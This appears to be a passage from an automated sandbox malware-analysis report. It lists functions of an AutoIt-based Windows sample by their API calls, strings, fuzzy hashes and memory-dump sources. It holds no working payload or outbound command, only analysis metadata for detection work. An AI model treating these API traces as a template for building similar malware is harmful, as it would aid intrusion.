                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                                        • Opcode ID: 40b7b9f1afc795c81534468735c4f0b82fdbde393fe0efdd516cb31f484082b1
                                                                                                                                        • Instruction ID: 14d3483412c5dfba799036ad57f18fedb82c0f62e2f585b2d9fd46c7c2cb9ba9
                                                                                                                                        • Opcode Fuzzy Hash: 40b7b9f1afc795c81534468735c4f0b82fdbde393fe0efdd516cb31f484082b1
                                                                                                                                        • Instruction Fuzzy Hash: 44E14D71900258AADF219FA0DC8AFEE7BB8FF05750F10815EF919AB190D7788A41CF60
                                                                                                                                        Function 007C744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007C7587
                                                                                                                                        • GetDesktopWindow.USER32 ref: 007C759C
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 007C75A3
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007C7605
                                                                                                                                        • DestroyWindow.USER32(?), ref: 007C7631
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C765A
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C7678
                                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007C769E
                                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 007C76B3
                                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007C76C6
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 007C76E6
                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007C7701
                                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007C7715
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 007C772D
                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 007C7753
                                                                                                                                        • GetMonitorInfoW.USER32 ref: 007C776D
                                                                                                                                        • CopyRect.USER32(?,?), ref: 007C7784
                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 007C77EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                        • Opcode ID: 3e07f894188e2276c4effd0b5d9125c8d6a3f001e93a0f393c27cdf50b885e89
                                                                                                                                        • Instruction ID: 8229acd0371debbaf2dae7a298e8f6209a9fc5bb58b36d444125c13d22ec5a3f
                                                                                                                                        • Opcode Fuzzy Hash: 3e07f894188e2276c4effd0b5d9125c8d6a3f001e93a0f393c27cdf50b885e89
                                                                                                                                        • Instruction Fuzzy Hash: DEB16B71608340AFDB18DF64C988F6ABBE5BF88350F00891DF5999B291DB78EC05CB95
                                                                                                                                        Function 0077A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0077A839
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 0077A841
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0077A86C
                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0077A874
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0077A899
                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0077A8B6
                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0077A8C6
                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0077A8F9
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0077A90D
                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 0077A92B
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 0077A947
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0077A952
                                                                                                                                          • Part of subcall function 0077B736: GetCursorPos.USER32(000000FF), ref: 0077B749
                                                                                                                                          • Part of subcall function 0077B736: ScreenToClient.USER32(00000000,000000FF), ref: 0077B766
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000001), ref: 0077B78B
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000002), ref: 0077B799
                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,0077ACEE), ref: 0077A979
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                        • Opcode ID: 62c2317186a59bb89e8c1a99fe975b627962c3271bb18c7d594258d396389a3e
                                                                                                                                        • Instruction ID: 042bb2f103af75be0ca1456c53dcd0613761dc85fe64a5bcce64ce3fce179c3e
                                                                                                                                        • Opcode Fuzzy Hash: 62c2317186a59bb89e8c1a99fe975b627962c3271bb18c7d594258d396389a3e
                                                                                                                                        • Instruction Fuzzy Hash: 39B18071A0020AEFDF14DFA8CC89BAD7BB4FB48354F108129FA159B290D778E851CB55
                                                                                                                                        Function 007C69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 007C6A52
                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007C6B12
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                        • API String ID: 3974292440-719923060
                                                                                                                                        • Opcode ID: 0d4aa86dd39bf60b52852e0f7b994d9cca4609fa1d276ecce2704890c1e0458e
                                                                                                                                        • Instruction ID: d8ce0caaac0151f16b3fdee37486cbf939143138cfbff2adba37dc29a00f47f7
                                                                                                                                        • Opcode Fuzzy Hash: 0d4aa86dd39bf60b52852e0f7b994d9cca4609fa1d276ecce2704890c1e0458e
                                                                                                                                        • Instruction Fuzzy Hash: 37A1AE70204201DBCB14EF24C995F6AB7A5FF84354F14896DF8A69B392DB38EC09CB52
                                                                                                                                        Function 0079DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0079DD87
                                                                                                                                        • __swprintf.LIBCMT ref: 0079DE28
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079DE3B
                                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0079DE90
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079DECC
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0079DF03
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0079DF55
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079DF8B
                                                                                                                                        • GetParent.USER32(?), ref: 0079DFA9
                                                                                                                                        • ScreenToClient.USER32(00000000), ref: 0079DFB0
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0079E02A
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E03E
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0079E064
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E078
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                        • String ID: %s%u
                                                                                                                                        • API String ID: 3119225716-679674701
                                                                                                                                        • Opcode ID: ed203bb06926559e348e5a9a585c419d1a8949579e1011873eeb1374bcffcf4c
                                                                                                                                        • Instruction ID: 7b8e0c20ed319e9ef8c9dbedb85eccd35345d1a305f3e609b7013c31a9a70dd6
                                                                                                                                        • Opcode Fuzzy Hash: ed203bb06926559e348e5a9a585c419d1a8949579e1011873eeb1374bcffcf4c
                                                                                                                                        • Instruction Fuzzy Hash: 2BA1E331204306EFDF24DF64D888BAAB7A8FF44350F108519F9AAD6191DB38ED45CB91
                                                                                                                                        Function 0079E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0079E6E1
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E6F2
                                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0079E71A
                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0079E737
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E755
                                                                                                                                        • _wcsstr.LIBCMT ref: 0079E766
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0079E79E
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E7AE
                                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0079E7D5
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0079E81E
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079E82E
                                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0079E856
                                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 0079E8BF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                                        • Opcode ID: b513b48af3519b0696a467b9a7941116c93b9b61cda3f7288d1b370bc57afafd
                                                                                                                                        • Instruction ID: e6340303bcf09600d867333fb6573747843fc1a9e8735ec83914292d03711cc8
                                                                                                                                        • Opcode Fuzzy Hash: b513b48af3519b0696a467b9a7941116c93b9b61cda3f7288d1b370bc57afafd
                                                                                                                                        • Instruction Fuzzy Hash: 4A81A131008245DBDF15DF50E885FAA7BE8FF44764F04846AFD859A092DB38ED46CBA2
                                                                                                                                        Function 0079E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                                        • Opcode ID: 4ac5be907f9438d4e2e57df716b95c86b403e3bc3eb145a1a44aba211e9b6246
                                                                                                                                        • Instruction ID: dea7ccbbe90ac3a9b4f810de89b000f3dc5ac1006bb03266925f832f1d23f70d
                                                                                                                                        • Opcode Fuzzy Hash: 4ac5be907f9438d4e2e57df716b95c86b403e3bc3eb145a1a44aba211e9b6246
                                                                                                                                        • Instruction Fuzzy Hash: DC31E031A44205EADB28FB20ED07EEE73A8AF10754F200424FA52B11D2FF5D6F64C6A1
                                                                                                                                        Function 0079F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(00000063), ref: 0079F8AB
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0079F8BD
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0079F8D4
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0079F8E9
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0079F8EF
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0079F8FF
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0079F905
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0079F926
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0079F940
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079F949
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0079F9B4
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0079F9BA
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0079F9C1
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0079FA0D
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0079FA1A
                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0079FA3F
                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0079FA6A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3869813825-0
                                                                                                                                        • Opcode ID: c74489024bd2cdcbc6cf58ce93acd15417a8d6006e0e4265f8e65ae06b1033f4
                                                                                                                                        • Instruction ID: 70f65b03342302722891516c6d53fd172a5ea2732d50a1d149f79ac98be2c326
                                                                                                                                        • Opcode Fuzzy Hash: c74489024bd2cdcbc6cf58ce93acd15417a8d6006e0e4265f8e65ae06b1033f4
                                                                                                                                        • Instruction Fuzzy Hash: 59514A70900709AFDB209FA8DD89FAEBBB5FF08704F004928E596E65A0C778AD54CB10
                                                                                                                                        Function 007B01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B026A
                                                                                                                                        • _wcschr.LIBCMT ref: 007B0278
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B028F
                                                                                                                                        • _wcscat.LIBCMT ref: 007B029E
                                                                                                                                        • _wcscat.LIBCMT ref: 007B02BC
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B02DD
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007B03BA
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B03DF
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B03F1
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B0406
                                                                                                                                        • _wcscat.LIBCMT ref: 007B041B
                                                                                                                                        • _wcscat.LIBCMT ref: 007B042D
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0442
                                                                                                                                          • Part of subcall function 007AC890: _wcscmp.LIBCMT ref: 007AC92A
                                                                                                                                          • Part of subcall function 007AC890: __wsplitpath.LIBCMT ref: 007AC96F
                                                                                                                                          • Part of subcall function 007AC890: _wcscpy.LIBCMT ref: 007AC982
                                                                                                                                          • Part of subcall function 007AC890: _wcscat.LIBCMT ref: 007AC995
                                                                                                                                          • Part of subcall function 007AC890: __wsplitpath.LIBCMT ref: 007AC9BA
                                                                                                                                          • Part of subcall function 007AC890: _wcscat.LIBCMT ref: 007AC9D0
                                                                                                                                          • Part of subcall function 007AC890: _wcscat.LIBCMT ref: 007AC9E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                        • API String ID: 2955681530-2806939583
                                                                                                                                        • Opcode ID: d03b1a8ee4e9185687bc4ce605680055b45e82a877f58770d2abc38d6ace42ba
                                                                                                                                        • Instruction ID: a0c86fc2630199c2a65f371f0e273df33ea972355986ecf57f3662b80e5e47b4
                                                                                                                                        • Opcode Fuzzy Hash: d03b1a8ee4e9185687bc4ce605680055b45e82a877f58770d2abc38d6ace42ba
                                                                                                                                        • Instruction Fuzzy Hash: 9B91AD71504745EFCB24EB54C859FDBB3E8AF84310F04495DF9499B292EB38EA48CB92
                                                                                                                                        Function 007CCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007CCD0B
                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 007CCD83
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007CCE04
                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007CCE26
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CCE35
                                                                                                                                        • DestroyWindow.USER32(?), ref: 007CCE52
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00760000,00000000), ref: 007CCE85
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CCEA4
                                                                                                                                        • GetDesktopWindow.USER32 ref: 007CCEB9
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 007CCEC0
                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007CCED2
                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007CCEEA
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                        • String ID: 0$tooltips_class32
